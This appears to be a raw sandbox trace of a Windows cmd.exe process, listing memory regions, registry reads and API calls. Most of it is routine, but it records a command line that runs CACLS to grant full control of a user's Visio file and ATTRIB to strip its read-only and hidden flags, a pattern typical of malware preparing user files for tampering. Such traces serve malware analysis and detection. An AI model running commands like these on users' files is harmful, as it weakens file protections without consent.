35137 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35234 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35235 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35236 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 35237 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35238 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 35239 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35240 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35241 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35242 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35243 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35244 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35245 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35246 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35247 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35248 start_va = 0x340000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 35249 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35250 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35251 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 35252 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 35253 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 35254 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 35255 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 35256 start_va = 0x520000 end_va = 0x111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 35257 start_va = 0x1120000 end_va = 0x1282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Region: id = 35522 start_va = 0x1290000 end_va = 0x155efff entry_point = 0x1290000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 882 os_tid = 0x140 [0234.639] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fd44 | out: lpSystemTimeAsFileTime=0x18fd44*(dwLowDateTime=0xbf51a2a0, dwHighDateTime=0x1d440a9)) [0234.639] GetCurrentProcessId () returned 0x828 [0234.639] GetCurrentThreadId () returned 0x140 [0234.639] GetTickCount () returned 0x40711 [0234.639] QueryPerformanceCounter (in: lpPerformanceCount=0x18fd3c | out: lpPerformanceCount=0x18fd3c*=29142789843) returned 1 [0234.639] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0234.639] __set_app_type (_Type=0x1) [0234.639] __p__fmode () returned 0x76b331f4 [0234.639] __p__commode () returned 0x76b331fc [0234.639] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0234.640] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0234.640] GetCurrentThreadId () returned 0x140 [0234.640] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x140) returned 0x38 [0234.640] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.640] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0234.640] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.640] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0234.640] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fcd4 | out: phkResult=0x18fcd4*=0x0) returned 0x2 [0234.640] VirtualQuery (in: lpAddress=0x18fd0b, lpBuffer=0x18fca4, dwLength=0x1c | out: lpBuffer=0x18fca4*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.640] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fca4, dwLength=0x1c | out: lpBuffer=0x18fca4*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0234.640] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fca4, dwLength=0x1c | out: lpBuffer=0x18fca4*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0234.640] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fca4, dwLength=0x1c | out: lpBuffer=0x18fca4*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.640] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fca4, dwLength=0x1c | out: lpBuffer=0x18fca4*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0234.640] GetConsoleOutputCP () returned 0x1b5 [0234.640] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.640] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0234.640] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.640] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0234.641] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.641] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.641] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.641] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.641] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.641] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.641] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.641] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0234.641] GetEnvironmentStringsW () returned 0x250220* [0234.641] FreeEnvironmentStringsW (penv=0x250220) returned 1 [0234.642] GetEnvironmentStringsW () returned 0x250220* [0234.642] FreeEnvironmentStringsW (penv=0x250220) returned 1 [0234.642] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ec44 | out: phkResult=0x18ec44*=0x40) returned 0x0 [0234.642] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ec4c, lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x0, lpData=0x18ec50*=0xb0, lpcbData=0x18ec48*=0x1000) returned 0x2 [0234.642] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ec4c, lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x4, lpData=0x18ec50*=0x1, lpcbData=0x18ec48*=0x4) returned 0x0 [0234.642] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ec4c, lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x0, lpData=0x18ec50*=0x1, lpcbData=0x18ec48*=0x1000) returned 0x2 [0234.642] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ec4c, lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x4, lpData=0x18ec50*=0x0, lpcbData=0x18ec48*=0x4) returned 0x0 [0234.642] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ec4c, lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x4, lpData=0x18ec50*=0x40, lpcbData=0x18ec48*=0x4) returned 0x0 [0234.642] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ec4c, lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x4, lpData=0x18ec50*=0x40, lpcbData=0x18ec48*=0x4) returned 0x0 [0234.642] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ec4c, lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x0, lpData=0x18ec50*=0x40, lpcbData=0x18ec48*=0x1000) returned 0x2 [0234.642] RegCloseKey (hKey=0x40) returned 0x0 [0234.642] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ec44 | out: phkResult=0x18ec44*=0x40) returned 0x0 [0234.642] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ec4c, lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x0, lpData=0x18ec50*=0x40, lpcbData=0x18ec48*=0x1000) returned 0x2 [0234.642] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ec4c, lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x4, lpData=0x18ec50*=0x1, lpcbData=0x18ec48*=0x4) returned 0x0 [0234.642] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ec4c, lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x0, lpData=0x18ec50*=0x1, lpcbData=0x18ec48*=0x1000) returned 0x2 [0234.642] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ec4c, lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x4, lpData=0x18ec50*=0x0, lpcbData=0x18ec48*=0x4) returned 0x0 [0234.642] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ec4c, lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x4, lpData=0x18ec50*=0x9, lpcbData=0x18ec48*=0x4) returned 0x0 [0234.642] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ec4c, lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x4, lpData=0x18ec50*=0x9, lpcbData=0x18ec48*=0x4) returned 0x0 [0234.642] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ec4c, lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x0, lpData=0x18ec50*=0x9, lpcbData=0x18ec48*=0x1000) returned 0x2 [0234.642] RegCloseKey (hKey=0x40) returned 0x0 [0234.642] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0234.642] srand (_Seed=0x5b8863c2) [0234.642] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\"" [0234.642] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\"" [0234.643] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.643] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x251980, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0234.643] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.643] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0234.643] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.643] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0234.643] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0234.643] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0234.643] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0234.643] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0234.643] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0234.643] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0234.643] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0234.643] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0234.643] GetEnvironmentStringsW () returned 0x252370* [0234.643] FreeEnvironmentStringsW (penv=0x252370) returned 1 [0234.643] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.643] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.643] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0234.644] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0234.644] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0234.644] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0234.644] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0234.644] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0234.644] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0234.644] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0234.644] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18fa10 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.644] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18fa10, lpFilePart=0x18fa0c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18fa0c*="Desktop") returned 0x18 [0234.644] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.644] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f78c | out: lpFindFileData=0x18f78c) returned 0x250a00 [0234.644] FindClose (in: hFindFile=0x250a00 | out: hFindFile=0x250a00) returned 1 [0234.644] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f78c | out: lpFindFileData=0x18f78c) returned 0x250a00 [0234.644] FindClose (in: hFindFile=0x250a00 | out: hFindFile=0x250a00) returned 1 [0234.644] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f78c | out: lpFindFileData=0x18f78c) returned 0x250a00 [0234.644] FindClose (in: hFindFile=0x250a00 | out: hFindFile=0x250a00) returned 1 [0234.644] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.645] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0234.645] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0234.645] GetEnvironmentStringsW () returned 0x250220* [0234.645] FreeEnvironmentStringsW (penv=0x250220) returned 1 [0234.645] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.645] GetConsoleOutputCP () returned 0x1b5 [0234.645] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.645] GetUserDefaultLCID () returned 0x409 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fb50, cchData=128 | out: lpLCData="0") returned 2 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fb50, cchData=128 | out: lpLCData="0") returned 2 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fb50, cchData=128 | out: lpLCData="1") returned 2 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0234.646] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0234.647] GetConsoleTitleW (in: lpConsoleTitle=0x240938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.647] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.647] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0234.647] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0234.647] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0234.648] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0234.648] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0234.648] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0234.648] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0234.648] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0234.648] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0234.648] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0234.648] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0234.651] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0234.651] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0234.651] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0234.651] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0234.651] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0234.651] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0234.651] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0234.652] GetConsoleTitleW (in: lpConsoleTitle=0x18f7e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.652] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0234.652] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0234.652] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0234.652] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0234.653] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0234.653] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0234.653] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0234.653] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0234.653] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0234.653] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0234.653] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0234.653] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0234.653] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0234.653] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0234.653] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0234.653] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0234.653] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0234.653] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0234.653] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0234.653] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0234.653] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0234.653] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0234.653] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0234.653] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0234.653] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0234.653] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0234.653] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0234.653] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0234.653] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0234.653] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0234.653] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0234.653] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0234.653] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0234.653] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0234.653] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0234.653] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0234.653] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0234.653] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0234.653] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0234.653] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0234.653] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0234.653] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0234.653] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0234.653] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0234.653] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0234.653] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0234.653] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0234.653] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0234.653] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0234.653] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0234.653] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0234.653] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0234.653] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0234.654] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0234.654] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0234.654] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0234.654] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0234.654] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0234.654] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0234.654] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0234.654] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0234.654] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0234.654] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0234.654] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0234.654] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0234.654] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0234.654] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0234.654] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0234.654] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0234.654] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0234.654] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0234.654] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0234.654] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0234.654] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0234.654] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0234.654] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0234.654] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0234.654] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0234.654] 